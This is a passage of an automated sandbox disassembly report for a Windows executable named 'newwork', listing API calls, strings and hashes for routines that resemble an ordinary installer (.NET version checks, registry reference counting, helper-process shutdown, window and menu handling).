                                                                                          • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                        Strings
                                                                                        • v4.0.30319, xrefs: 004594F1
                                                                                        • .NET Framework version %s not found, xrefs: 00459609
                                                                                        • .NET Framework not found, xrefs: 0045961D
                                                                                        • v2.0.50727, xrefs: 0045955B
                                                                                        • v1.1.4322, xrefs: 004595C2
                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$Open
                                                                                        • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                        • API String ID: 2976201327-446240816
                                                                                        • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                        • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                        • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                        • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                        • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                        • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                        • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                        • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                        Strings
                                                                                        • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                        • Helper process exited., xrefs: 00458AC5
                                                                                        • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                        • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                        • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                        • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                        • API String ID: 3355656108-1243109208
                                                                                        • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                        • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                        • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                        • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                        APIs
                                                                                          • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                          • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                        • , xrefs: 004545B1
                                                                                        • RegCreateKeyEx, xrefs: 004545C3
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFormatMessageQueryValue
                                                                                        • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                        • API String ID: 2481121983-1280779767
                                                                                        • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                        • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                        • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                        • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                        APIs
                                                                                          • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                          • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                        • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                        • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                          • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                        • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                        • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                        • API String ID: 1549857992-2312673372
                                                                                        • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                        • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                        • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                        • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                        • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                        • API String ID: 4190037839-2312295185
                                                                                        • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                        • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                        • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                        • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                        APIs
                                                                                        • GetActiveWindow.USER32 ref: 004629FC
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                        • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                        • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                        • API String ID: 2610873146-3407710046
                                                                                        • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                        • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                        • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                        • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                        APIs
                                                                                        • GetActiveWindow.USER32 ref: 0042F194
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                        • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                        • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                        • API String ID: 2610873146-3407710046
                                                                                        • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                        • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                        • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                        • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,021A3858,00000000), ref: 00458C79
                                                                                        • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                        • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                        • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                        • String ID: CreateEvent$TransactNamedPipe
                                                                                        • API String ID: 2182916169-3012584893
                                                                                        • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                        • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                        • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                        • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                        • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                        • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                        • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                        • API String ID: 1914119943-2711329623
                                                                                        • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                        • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                        • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                        • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                        APIs
                                                                                        • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                        • SaveDC.GDI32(?), ref: 00416E27
                                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                        • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                        • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                        • DeleteObject.GDI32(?), ref: 00416F22
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                        • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                        • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                        • String ID:
                                                                                        • API String ID: 375863564-0
                                                                                        • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                        • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                        • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                        • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                        • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                        • String ID:
                                                                                        • API String ID: 1694776339-0
                                                                                        • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                        • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                        • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                        • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                        APIs
                                                                                        • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                        • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                        • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                        • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                        • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                        • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                        • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                        • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
